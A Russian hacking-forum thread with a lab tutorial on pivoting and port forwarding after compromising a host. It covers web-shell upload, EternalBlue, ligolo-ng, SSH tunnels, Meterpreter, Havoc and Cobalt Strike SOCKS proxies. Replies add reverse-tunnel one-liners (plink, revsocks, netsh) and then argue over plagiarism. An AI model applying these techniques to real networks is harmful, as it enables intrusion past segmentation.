• XSS.stack #1 – первый литературный журнал от юзеров форума

Pivoting Развёрнутый гайд по Pivoting для новичков(Часть 1-ая)

Эрмано

(L3) cache
Пользователь
Регистрация
28.08.2024
Сообщения
261
Решения
1
Реакции
182
Написал: Эрмано
Специально для xss.pro

Недавно я заметил, как сложно новичкам освоить пивотинг(например моему другу), поэтому я решил написать полный и развёрнутый гайд на эту тему.
Я расскажу про пивотинг и Port forwarding на скомпроментированых хостах

Оглавление
Часть 1:
  • Что это такое, какие виды бывают и для чего
  • Обзор лаборатории
  • Практика Pivoting
  • Практика Port Forwarding
  • Заключение
Часть 2:
  • Обзор лаборатории
  • Remote Port Forwarding
  • Практика Pivoting(Double Pivoting)
  • SMB Named Pipes
  • Заключение
Итак, предлагаю начать!

Что это такое, для чего нужно и какие виды бывают
Я начну с пивотинга:
Пивотинг - это техника, для обхода сегментации сети и проброса нашего трафика внутрь
То есть, мы используем эту технику для того, чтобы пробросить траффик с машины атакующего, в локальную сеть компании, в которую мы не имеем доступа(из-за сегментации).
Пивотинг бывает разный, я разберу основные техники и инструменты.

Далее про Port Forwarding
Port Forwarding (проброс или перенаправление портов) - это техника, позволяющая пересылать сетевые пакеты с одного порта на другой между устройствами
Бывают несколько видов Port Forwarding'а - локальный, удалённый и динамический.

Локальный проброс портов
Проброс порта с нашей машины на удалённую:
ssh -N -L local_addr:local_port:remote_addr:remote_port user@target

Здесь - local_addr и local_port - это адрес и порт на вашем локальном компьютере
remote_addr и remote_port - это адрес и порт на удалённом сервере, до которого мы хотим добраться
user@target - машина, через которую мы пробросим траффик

Удалённый проброс портов
ssh -N -R remote_address:remote_port:local_address:local_port user@target

Тут мы удалённо переадресовываем порты с удалённой машины, на локальную(нашу).

Динамический проброс портов
Это туннелирование всего сетевого трафика атакующего (а не только одного порта) через удаленную машину(похоже на прокси).
ssh -N -D port user@target

В данной команде
port - порт, через который мы направим траффик
target - это адрес удалённого сервера, к которому мы подключаемся, там будет создан SOCKS-канал, через который будем перенаправлять сетевой трафик.


Обзор лаборатории
У нас будет 2 кейса - с одной сетью и с двумя. Выглядят они так

1730136141964.png
Кейс 1 (В этой части)

1730133315524.png
Кейс 2 (Во 2-й части)

Стрелками, я отметил наш путь, до целевых хостов.
Итак, начнём.

Практика Pivoting
Я начал именно с пивотинга, потому что на мой взгляд лучше сначала рассказать и показать его.

Кейс 1
Я решил, просмотреть хосты, что у меня есть и обнаружил, что:
  1. IP Windows машины - 10.0.2.6, IP Linux машины - 10.0.2.5
  2. Linux машина имеет веб-интерфейс, через который мы можем загружать файлы
Собственно говоря для начала я покажу классические методы Pivoting'а, для этого я скомпроментирую Linux-хост и с помощью нескольких утилит перенаправлю свой трафик, на интересующий меня хост:
Для начала рассмотрим веб-интерфейс Linux-хоста и попробуем загрузить наш шелл:
1730137514841.png
Веб-интерфейс Linux-хоста
Далее, я немного подредактировал шелл, и закинул его на хост:
1730137958117.png


И получил коннект:

1730138047918.png


Хорошо, я просмотрел сетевые интерфейсы и увидел следующую картину:

1730138095969.png
(Нас интересует подсеть 10.0.0.0/24, в которой у хоста адрес - 10.0.0.2, а у интересующей нас машины - 10.0.0.1)

Теперь, я с помощью разных утилит проброшу свой трафик в интересующую меня подсеть и просканирую её:
Go Simple Tunnel
Go Simple Tunnel работает в режиме прокси и имеет много режимов, о которых вы можете почитать в официальном репозитории.
Чтож, начнём

Доставка утилиты:
1730140396565.png


Запуск:
1730140520885.png
Это лишь просто пример, на самом деле функций больше

И пробуем добраться до машины
1730140617053.png

Всё получилось!
Однако, не всё может получаться, например скан сети, что и делает этот инструмент не таким уже и хорошим.

Ligolo-ng
Лично у меня это фаворит и самый любимый способ, при пивотинге(потому что работает как VPN :zns6:), так что его я опишу вторым.
Нам нужен прокси(помечен как прокси) и агент(помечен, как агент), которые мы возьмём тут.
Proxy, мы запускаем на своей машине, а агент на скомпроментированой.

1730141184631.png
Запуск прокси(на машине атакующего)

1730141342668.png
Переносим агент

1730141388852.png
Коннектимся к серверу

1730141890045.png
Работаем с сессией

Теперь нам нужно поднять новый сетевой интерфейс и добавить путь к подсети, к которой мы хотим получить доступ:
Поднимаем интерфейс:
Код:
ip tuntap add user root mode tun ligolo

ip link set ligolo up

Код:
ip route add 10.0.0.0/24 dev ligolo

ip route list


1730142124783.png
Добавляем интерфейс

1730142139817.png
Добавляем путь

Потом начинаем туннелирование командой start:
1730142173634.png


Теперь тестируем
1730142219452.png
Пингуем интересующий хост

1730142287103.png
Сканируем сеть

1730142452273.png

Тут были основные способы(то есть без экзотики) пивотинга, которые чаще всего используют, но всё это было на Linux.
Теперь я расскажу про Windows-хосты. Я знаю, что рассказывать тут особо нечего, потому что команды и принцип одинаковы, однако я расскажу про пивотинг, из популярных C2(В частности я расскажу про Havoc Framework и Cobalt Strike)


C2
В этом разделе я расскажу про то, как реализован пивотинг в разных C2 утилитах

Meterpreter
Здесь мы будем использовать 2 варианта - autoroute и модуль auxiliary/server/socks_proxy

1730144575582.png
Создаём payload


1730144879988.png
Загружаем на хост

1730144841204.png
Настраиваем и запускаем Handler

1730144907672.png
Получаем сессию

Autoroute
Мы добавляем путь в сеть, в которою хотим добраться:
run autoroute -s 10.0.0.0/24

1730144998941.png
Добавляем route

Теперь мы можем взаимодействовать с хостами в той сети, однако при таком пробросе, мы можем взаимодействовать с той сетью, только модулями Metasploit, а для того, чтобы работать с той сетью с помощью Proxychains, мы должны использовать модуль - auxiliary/server/socks_proxy

Ставим версию 4a - set VERSION 4a

1730145384265.png
Теперь этот модуль будет взаимодействовать с только что заданным маршрутом, тут мы выставлем локальный IP и PORT для прослушивания

Потом мы добавляем запись в /etc/proxychains4.conf - socks4 127.0.0.1 1080

1730145532235.png
И пробуем досуп до хоста
Всё отлично!


Havoc Framework

После того, как я создал пейлоад(тут без картинок), я разведал Windows машину и узнал, что это Windows Server 2008 R2, а значит уязвим для MS17-010(eternalblue), которую мы проэксплуатируем через Metasploit.

1730146753793.png

1730146807177.png


Потом запустим экспойт:

1730193081686.png


Далее я запустил шелл(команда shell) и скачал агент

1730147067682.png
Скачиваем агент

Запускаем и получаем доступ

1730147140617.png


1730147171551.png


Теперь мы можем в консоль системы вписать: socks add 6080 и добавить запись - socks5 127.0.0.1 6080 в /etc/proxychains4.conf, для взаимодействия со внутренней сетью с помощью агента.

1730191993764.png
Запуск прокси

1730192037515.png
Смотрим доступ
Отлично!

Cobalt Strike
Наверно это один из самых популярных(на мой взгляд) C2 фреймворков, оно и понятно, ведь в нём множество модулей, под разные Red Team задачи.

Итак, мы уже получили доступ к оболочке в системы и теперь мы просто должны создать агент и загрузить его на подконтрольную систему:

1730202408539.png
Загружаем Агент

1730193888335.png
Получаем сессию

Далее ПКМ по агенту -> Pivoting -> SOCKS Server

1730194118840.png



Стартуем сервер:
1730194329144.png
(Также вы можете выставить socks5)

Добавляем socks4

1730194558249.png


Далее в /etc/proxychains4.conf мы добавляем - socks4 127.0.0.1 9988 и пробуем доступ до хоста:

1730194606783.png

Отлично!
Думаю на этой ноте можно закончить нашу практику по Pivoting и перейти к теме проброса портов(Port Forwarding)

Практика Port Forwarding
Эта техника полезна, когда атакующий не может подгрузить утилиту и приходится работать с тем, что есть.
Начнём мы с Local Port Forwarding(можете почитать в начале)

Local Port Forwarding
Я буду использовать Linux-машину, потому что на ней предустановлен SSH, однако на Windows все команды те же:
Итак, для того, чтобы локально пробросить порт нам нужно знать креды от хоста(что проблематично), но мы представим, что мы их узнали;)

Итак, мы вписываем ssh -N -L 127.0.0.1:9999:10.0.0.1:80 ubuntu@10.0.2.5 и теперь, все если обратиться к localhost:9999, нас перекинет на внутренний вебсайт(10.0.0.1) через доступный нам хост 10.0.2.5
1730197788397.png
Выполняем проброс

1730197814580.png
Редирект с localhost:9999 на 10.0.0.1:80
Хорошо, теперь приступим к следующей технике.

Dynamic Port Forwarding
С помощью динамического проброса портов, мы можем проксировать наш весь трафик через порт удалённой машины.
Чтобы выполнить динамический проброс мы должны вписать следующую команду: ssh -N -D 4444 ubuntu@10.0.2.5
Этой командой мы перенаправим наш трафик через порт 4444 на Linux-машине:

1730201240249.png


Потом добавляем запись - socks4 127.0.0.1 4444 в /etc/proxychains4.conf и пробуем доступ к хосту:
1730201440503.png

У нас всё получилось! На этой ноте я закончу статью(я дошёл до максимума картинок =) )

Заключение
В этой статье мы разобрались что из себя представляет Pivoting и Port Forwarding, также разобрались как работать со специальными утилитами и C2 фреймворками.
Всем спасибо за прочтение, надеюсь статья была полезна.

P. S. Поправьте или дополните, если я что-то упустил:)

P. S..2 Я знаю, что есть эта статья, но в ней рассказывается про пивотинг с роутеров.
 

Вложения

  • 1730145481150.png
    1730145481150.png
    14.2 КБ · Просмотры: 25
Последнее редактирование:
Сам когда-то очень долго над пивотингом мозг ломал.
Я тоже, поэтому и написал
Отличная практика для начинающих также рисовать карту сети от руки или в любом графическом редакторе.
Это была первая ссылка по запросу нарисовать диаграмму онлайн
Ligolo-ng one love, подтверждаю. Гораздо приятнее именно с VPN работать.
Да, и с ним не нужно чейнить пивоты как с Chisel(который у меня не завёлся)
 
Есть множество инструментов для пивотинга, мой любимый ligolo-ng при условии что нет АВ на таргете. Вот еще хорошая статья: https://software-sinner.medium.com/how-to-tunnel-and-pivot-networks-using-ligolo-ng-cf828e59e740
Так же еще можно использовать:
socat http://www.dest-unreach.org/socat/doc/socat.html
Код:
socat TCP-LISTEN:2222,fork TCP:10.4.50.215:22
chisel - https://github.com/jpillora/chisel/releases тоже хороший инструмент, хорошая стабильность сети (относительно autoroute из msf который наверное самый ужасный из всего что приходилось юзать)
netcat - https://gist.github.com/holly/6d52dd9addd3e58b2fd5 даже так можно.
sshuttle - https://github.com/sshuttle/sshuttle (Supports DNS tunneling)
Код:
sshuttle -r database_admin@192.168.218.63:2222 10.4.218.0/24 172.16.218.0/24
plink - из набора бинарников PuTty это когда ssh.exe нет, который якобы идет уже по дефолту но его бывает выпиливают.
Код:
cmd.exe /c echo y | C:\Windows\Temp\plink.exe -ssh -l kali -pw kali -R 127.0.0.1:9833:127.0.0.1:3389 192.168.45.242
netsh - один из любимых способов но требует админ права.
Код:
netsh interface portproxy add v4tov4 listenport=2222 listenaddress=192.168.50.64 connectport=22 connectaddress=10.4.50.215
dnscat - https://github.com/iagox86/dnscat2
rinetd - https://github.com/samhocevar/rinetd мало документированый но тоже интересный инструмент.
 
Есть множество инструментов для пивотинга, мой любимый ligolo-ng при условии что нет АВ на таргете. Вот еще хорошая статья: https://software-sinner.medium.com/how-to-tunnel-and-pivot-networks-using-ligolo-ng-cf828e59e740
Так же еще можно использовать:
socat http://www.dest-unreach.org/socat/doc/socat.html
Код:
socat TCP-LISTEN:2222,fork TCP:10.4.50.215:22
chisel - https://github.com/jpillora/chisel/releases тоже хороший инструмент, хорошая стабильность сети (относительно autoroute из msf который наверное самый ужасный из всего что приходилось юзать)
netcat - https://gist.github.com/holly/6d52dd9addd3e58b2fd5 даже так можно.
sshuttle - https://github.com/sshuttle/sshuttle (Supports DNS tunneling)
Код:
sshuttle -r database_admin@192.168.218.63:2222 10.4.218.0/24 172.16.218.0/24
plink - из набора бинарников PuTty это когда ssh.exe нет, который якобы идет уже по дефолту но его бывает выпиливают.
Код:
cmd.exe /c echo y | C:\Windows\Temp\plink.exe -ssh -l kali -pw kali -R 127.0.0.1:9833:127.0.0.1:3389 192.168.45.242
netsh - один из любимых способов но требует админ права.
Код:
netsh interface portproxy add v4tov4 listenport=2222 listenaddress=192.168.50.64 connectport=22 connectaddress=10.4.50.215
dnscat - https://github.com/iagox86/dnscat2
rinetd - https://github.com/samhocevar/rinetd мало документированый но тоже интересный инструмент.
Я про них знаю, не зря же это 1-ая часть)

chisel - https://github.com/jpillora/chisel/releases тоже хороший инструмент, хорошая стабильность сети (относительно autoroute из msf который наверное самый ужасный из всего что приходилось юзать)
чисел не завёлся почему-то, решил потом написать, в Double Pivoting, расскажу как чейнить его пивоты
netcat - https://gist.github.com/holly/6d52dd9addd3e58b2fd5 даже так можно.
Про него знаю, да на тачке была старая версия, а ставить новую невозможно(траблы с пакетами), короче зашёл в тупик
Во второй части будет, я тут в конце сказал - достиг лимита картинок
относительно autoroute из msf который наверное самый ужасный из всего что приходилось юзать)
Не знаю, мне он нравится, но да, стабильность бывает хромает, но с лиголой также, хочешь нмапом сетку посканить, а соединение рушится
 
но с лиголой также,
у меня все супер отлично с лиголо, соединение идеальное, но слышал про такую проблему, должна лечиться через уменьшение размера TCP пакета в MTU:
Код:
ip link set dev <интерфейс> mtu <размер MTU>
Максимальный (дефолтный) 1500, попробуй поставить 1200.

Чатгпт так же советует, но я не тестил.
Код:
sysctl -w net.ipv4.tcp_mtu_probing=1
Этот параметр позволяет TCP динамически подбирать оптимальное значение MTU.

Снижение MSS (Maximum Segment Size):
Код:
iptables -A FORWARD -p tcp --tcp-flags SYN,RST SYN -j TCPMSS --set-mss 1200
MSS указывает максимальный размер TCP-сегмента (без заголовков), который можно передать. Уменьшение MSS может предотвратить фрагментацию и повысить стабильность.

чисел не завёлся почему-то,
попробуй более старые версии, в одном из обновлений у них были косяки, вроде как эта ветка стабильная из старенького : https://github.com/jpillora/chisel/releases/tag/v1.8.1 ну и клиент+сервер по версии обязаны совпадать.
 
попробуй более старые версии, в одном из обновлений у них были косяки, вроде как эта ветка стабильная из старенького : https://github.com/jpillora/chisel/releases/tag/v1.8.1 ну и клиент+сервер по версии обязаны совпадать.
Ой, спасибо добрый человек

у меня все супер отлично с лиголо, соединение идеальное, но слышал про такую проблему, должна лечиться через уменьшение размера TCP пакета в MTU:
У меня так то тоже, просто бывает NMAP рушит чуть чуть, а так всё идеально
 
Хорошая статья, спасибо! Как раз сам недавно голову ломал, но спустя пару бессонных ночей понял эту штуку.
ОТ себя добавлю про revsocks https://github.com/kost/revsocks

Код:
revsocks -listen :8443 -socks 127.0.0.1:1080 -pass SuperSecretPassword
revsocks -connect clientIP:8443 -pass SuperSecretPassword

Сейчас ломаю голову над тем, как эм.. натянуть весь траффик с проброшенного порта на сетевуху, чтобы иметь общую сеть с жертвой. Proxychains хоть и позволяет что-то, но тот же респондер ему не скормишь. Имеет ли смысл дальше думать в этом направлении или я где-то фундаментально ошибаюсь?
 
Хорошая статья, спасибо! Как раз сам недавно голову ломал, но спустя пару бессонных ночей понял эту штуку.
ОТ себя добавлю про revsocks https://github.com/kost/revsocks

Код:
revsocks -listen :8443 -socks 127.0.0.1:1080 -pass SuperSecretPassword
revsocks -connect clientIP:8443 -pass SuperSecretPassword

Сейчас ломаю голову над тем, как эм.. натянуть весь траффик с проброшенного порта на сетевуху, чтобы иметь общую сеть с жертвой. Proxychains хоть и позволяет что-то, но тот же респондер ему не скормишь. Имеет ли смысл дальше думать в этом направлении или я где-то фундаментально ошибаюсь?
Если честно - не знаю, я не работал с revsocks, и думаю, что респондер будет лучше работать с пробросом черещ ligolo-ng, тут просто VPN, думаю можно попробовать
 
Если честно - не знаю, я не работал с revsocks, и думаю, что респондер будет лучше работать с пробросом черещ ligolo-ng, тут просто VPN, думаю можно попробовать
Я имел ввиду в широком смысле, не только с ревсоксом.
Кстати уже успел пощупать лиголо, если я правильно понимаю, он на хосте создаёт как раз новый сетевой адаптер и вещает через него траф клиента - то что надо!
 
Рано даёте овацию автору господа, часть материала отрерайчена с английского отсюда, изменены порты, подача команд (скрины похожи, структура тем в материале тоже), дальше лень искать, но думаю это склейка из набора статей с разных ресурсов (так как к автору доверия увы пока нет, он уже пытался один раз выдать рерайт с хабра за свою статью): https://gitbook.seguranca-informatica.pt/cheat-sheet-1/stuff/pivoting#pivoting-references

Так конечно интересно, но плюс ставить пока сомнительно, жду вторую часть.
 
Последнее редактирование:
Рано даёте овацию автору господа, часть материала отрерайчена с английского отсюда, изменены порты, подача команд (скрины похожи, структура тем в материале тоже), дальше лень искать, но думаю это склейка из набора статей с разных ресурсов (так как к автору доверия увы пока нет, он уже пытался один раз выдать рерайт с хабра за свою статью): https://gitbook.seguranca-informatica.pt/cheat-sheet-1/stuff/pivoting#pivoting-references

Так конечно интересно, но плюс ставить пока сомнительно, жду вторую часть.
Ну вообще-то нет, я сам писал, смысл мне переписывать отовсюду, если это заметят
рерайт с хабра за свою статью
Я взял код, и частично переписал то, что не понимал(детали уязвимости), остальное писал полностью сам
часть материала отрерайчена с английского отсюда
Ниоткуда она не отрерайчена и мне крайне неприятно слышать такое, а команды похожи, потому что они одни и теже всегда, я что должен переписать SSH под себя, чтобы изменились команды? Так что говорить, что тут отредаченные команды просто глупо.
Это ссылку я вижу впервые, я ничего ниоткуда не брал, даже во второй части(которую я пишу) будет написанно откуда я взял способ с обходом
дальше лень искать, но думаю это склейка из набора статей с разных ресурсов
Я бы поискал, прежде чем говорить такое

Итог: такое слышать довольно обидно, особенно, когда не проверили до конца и кидают странные придирки
 
Рано даёте овацию автору господа,
Я пока что даже лайк не ставил) Просто слегка поддержал беседу. Статья конечно написана в спешке, у автора есть привычка выдавать тонны контента в неделю, хотя какой смысл в етом, что ты будешь писать дальше если сейчас напишешь обо всем. Как я уже писал раньше лучше 2 хорошие в неделю чем 10 на скорую руку.
 
он уже пытался один раз выдать рерайт с хабра за свою статью
Кстати заметь - один раз, потом я понял, что даже при взятии частей нужно указывать источник и всегда указывал(и при копипасте и при переводах)
 
Последнее редактирование:
Статья конечно написана в спешке,
Не сказать, что в спешке, я занимаюсь этим, когда есть время, в основном от скуки
что ты будешь писать дальше если сейчас напишешь обо всем
У меня ещё много тем, от переводов, до своих статей
у автора есть привычка выдавать тонны контента в неделю
Увы, слишком много свободного времени =)
 
Ниоткуда она не отрерайчена и мне крайне неприятно слышать такое, а команды похожи, потому что они одни и теже всегда, я что должен переписать SSH под себя, чтобы изменились команды? Так что говорить, что тут отредаченные команды просто глупо.
Ой, давай не будем рассказывать сказки про белого бычка? Приглядись хорошо: там и твой автороут, и double pivoting в proxychain, использование msf, ligolo-ng в структуре и т.д... Пусть кто-то посмотрит и сравнит твой материал с тем, на который я дал ссылку, а также пройдется по источникам из той ссылки. (Да, там не все, возможно, что-то есть твое, поэтому я сразу и не стал лепить тебе минус. Хочу дождаться второй части, чтобы более детально всё проверить и проанализировать по твоим материалам. Если я неправ, то принесу свои извинения. Не в моих интересах душить тут авторов, которые дают уникальный контент, но в моих интересах чекать от авторов "уникальный материал" - заметь, в кавычках, чтобы нагнать пуху по своей экспертности до следующей встречи в арбитраже).
По поводу предыдущей статьи (один раз не п......с): помимо кода, она была по структуре 1 в 1 по твоей, и даже ничего от себя. Только произведен рерайт по каждому абзацу и замена скриншотов. (Да, ты повторил этот материал, за что тебе плюс, доказав, что метода рабочая в лабораторных условиях, но это не даёт тебе никакого права выдавать рерайт за свой материал). Не зря же там отредактировали пост и поставили источник на статью, убрав "Уникально для XSS от Эрмано"?
ТС, ты нас за дурачков держишь? (Это риторический вопрос, можешь на него не отвечать.) Обидно ему. Давай уже оставляй источники на материал, откуда берешь техники, чтобы не обижаться.

P.S. Хотя это и действительно может быть неприятно, если я не прав и излишне придирчив к ТС, но после той статейки с хабра отношусь скептически к его материалам.

P.S.S. Если вспомнить недавние события, у нас тут уже был лучший хакер России с зеленки, который после первого рерайта по AD, выданного за свой материал, пошел доказывать это во флудилку, создавая абсурдные темы о том, "как правильно сварить макароны".

P.S.S.S. Решил поискать, например, инфу по Ligolo, посмотрите это: https://medium.com/@Poiint/pivoting-with-ligolo-ng-0ca402abc3e9 - Как Вы думаете, это совпадение? Нет, ну предположим, автор молодец и сам всё сделал, а это просто совпадения. В любом случае статья хорошая, если даже это скомбинировано в одно целое (я так тоже иногда делаю, когда есть какая-то оригинальная идея, но чтобы не изобретать велосипеды, я подглядываю в чужие исходники, но не позволяю себе ставить метки, что написал это я специально для xss.pro. Да, написал, может быть, это и я, взяв чужой код и что-то добавив или изменив на свой лад (в счет не рассматриваются либы), но в научных сообществах за такие вещи бьют палками, когда автор присваивает себе чужие достижения и наработки). Можно ли это выдавать за свой материал?

Найди три отличия (что-то убрал, что-то поменял местами и выдал за свое):
1730278246190.png
 
Последнее редактирование:
Ой, давай не будем рассказывать сказки про белого бычка? Приглядись хорошо: там и твой автороут, и double pivoting в proxychain, использование msf, ligolo-ng в структуре и т.д... Пусть кто-то посмотрит и сравнит твой материал с тем, на который я дал ссылку, а также пройдется по источникам из той ссылки. (Да, там не все, возможно, что-то есть твое, поэтому я сразу и не стал лепить тебе минус. Хочу дождаться второй части, чтобы более детально всё проверить и проанализировать по твоим материалам. Если я неправ, то принесу свои извинения. Не в моих интересах душить тут авторов, которые дают уникальный контент, но в моих интересах чекать от авторов "уникальный материал" - заметь, в кавычках, чтобы нагнать пуху по своей экспертности до следующей встречи в арбитраже).
По поводу предыдущей статьи (один раз не п......с): помимо кода, она была по структуре 1 в 1 по твоей, и даже ничего от себя. Только произведен рерайт по каждому абзацу и замена скриншотов. (Да, ты повторил этот материал, за что тебе плюс, доказав, что метода рабочая в лабораторных условиях, но это не даёт тебе никакого права выдавать рерайт за свой материал). Не зря же там отредактировали пост и поставили источник на статью, убрав "Уникально для XSS от Эрмано"?
ТС, ты нас за дурачков держишь? (Это риторический вопрос, можешь на него не отвечать.) Обидно ему. Давай уже оставляй источники на материал, откуда берешь техники, чтобы не обижаться.

P.S. Хотя это и действительно может быть неприятно, если я не прав и излишне придирчив к ТС, но после той статейки с хабра отношусь скептически к его материалам.

P.S.S. Если вспомнить недавние события, у нас тут уже был лучший хакер России с зеленки, который после первого рерайта по AD, выданного за свой материал, пошел доказывать это во флудилку, создавая абсурдные темы о том, "как правильно сварить макароны".

P.S.S.S. Решил поискать, например, инфу по Ligolo, посмотрите это: https://medium.com/@Poiint/pivoting-with-ligolo-ng-0ca402abc3e9 - Как Вы думаете, это совпадение? Нет, ну предположим, автор молодец и сам всё сделал, а это просто совпадения. В любом случае статья хорошая, если даже это скомбинировано в одно целое (я так тоже иногда делаю, когда есть какая-то оригинальная идея, но чтобы не изобретать велосипеды, я подглядываю в чужие исходники, но не позволяю себе ставить метки, что написал это я специально для xss.pro. Да, написал, может быть, это и я, взяв чужой код и что-то добавив или изменив на свой лад (в счет не рассматриваются либы), но в научных сообществах за такие вещи бьют палками, когда автор присваивает себе чужие достижения и наработки). Можно ли это выдавать за свой материал?

Найди три отличия (что-то убрал, что-то поменял местами и выдал за свое):
Посмотреть вложение 97791
Probabilities of events become increasingly smaller when you chain multiple independent events together. Interesection of events.

Pr(E = "I wasn't aware of the fact that someone wrote an article on the same CVE, the same techniques, the same theory, the same tools, the same words in the same style as I did. Sorry, I wasn't aware. I didn't plagiarize. What an interesting fluke, a coincidence") ~ 0 (right hand limit)
Let's give @Ermano the benefit of doubt and make it Pr (E) <= 0.3

Now with the multiplication rule, chain 5 of those equally likely events (E1, E2, ..., E5) (5 articles accused of plagiarism)
Pr (E1 ∩ E2 ∩ E3 ∩ E4 ∩ E5) <= 0.3 ** 5
Pr <= 0.00243
 
Приглядись хорошо: там и твой автороут, и double pivoting в proxychain, использование msf, ligolo-ng в структуре и т.д... Пусть кто-то посмотрит и сравнит твой материал с тем, на который я дал ссылку, а также пройдется по источникам из той ссылки. (Да, там не все, возможно, что-то есть твое, поэтому я сразу и не стал лепить тебе минус
Хеххеех, серьёзно? я уже говоил по поводу команд и техник, найти что-то реально стоящее, чтобы придраться - команда всегда и везде одинаковые, если хочешь, чтобы были разные - будь добр, перепиши мне утилиты и скажи, как с ними работать, техники тоже самое - они сегда и везде одинаковые.
но после той статейки с хабра отношусь скептически к его материалам.
Ну это когда было + я тогда уже извинился
P.S.S. Если вспомнить недавние события
Скинь, я посмотрю(заинтриговал прям)
Решил поискать, например, инфу по Ligolo, посмотрите это: https://medium.com/@Poiint/pivoting-with-ligolo-ng-0ca402abc3e9 - Как Вы думаете, это совпадение? Нет, ну предположим, автор молодец и сам всё сделал, а это просто совпадения.
Ну слушай, я выше говорил, команды и последовательность всегда одинаковы, и смысл придираться к этому нет, я понимаю, если бы я писал слово в слово, но говорить, что статья плагиат, только из за того, что в разных статьях об одном инструменте одинаковые команды - глупо
Да, написал, может быть, это и я, взяв чужой код и что-то добавив или изменив на свой лад (в счет не рассматриваются либы), но в научных сообществах за такие вещи бьют палками, когда автор присваивает себе чужие достижения и наработки). Можно ли это выдавать за свой материал?
Заметь - я прикрепил ссылки к каждому инструменту и C2, потому что они не мои, там же и документация, и как ты можешь видеть - команды и в документации и в медиуме и у меня и ещё у кучи авторов - одинаковы. Это плагиат? Нет, это один и тот же инструмент, если хочешь можешь дать мне последовательность, в которой писать следущую статью в ЛС, я напишу так, как тебе хочется, чтобы ты не придирался
 
https://xssforum7mmh3n56inuf2h73hvhnzobi7h2ytb3gvklrfqm7ut3xdnyd.onion/attachments/97791/
Кстати насчёт этой картинки - все и всегда, чтобы доказать доступ до хоста пингуют его, так что это снова ни о чём, пожалуйста, укажи, где я явно спёр, а не на похожие команды =)
 
Probabilities of events become increasingly smaller when you chain multiple independent events together. Interesection of events.

Pr(E = "I wasn't aware of the fact that someone wrote an article on the same CVE, the same techniques, the same theory, the same tools, the same words in the same style as I did. Sorry, I wasn't aware. I didn't plagiarize. What an interesting fluke, a coincidence") ~ 0 (right hand limit)
Let's give @Ermano the benefit of doubt and make it Pr (E) <= 0.3

Now with the multiplication rule, chain 5 of those equally likely events (E1, E2, ..., E5) (5 articles accused of plagiarism)
Pr (E1 ∩ E2 ∩ E3 ∩ E4 ∩ E5) <= 0.3 ** 5
Pr <= 0.00243
Чего, какие пять статей, я написал 1, за которую дали втык(не указал источники кода и разъяснений) и всё :/(хотя я может просто неправильно перевёл)
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх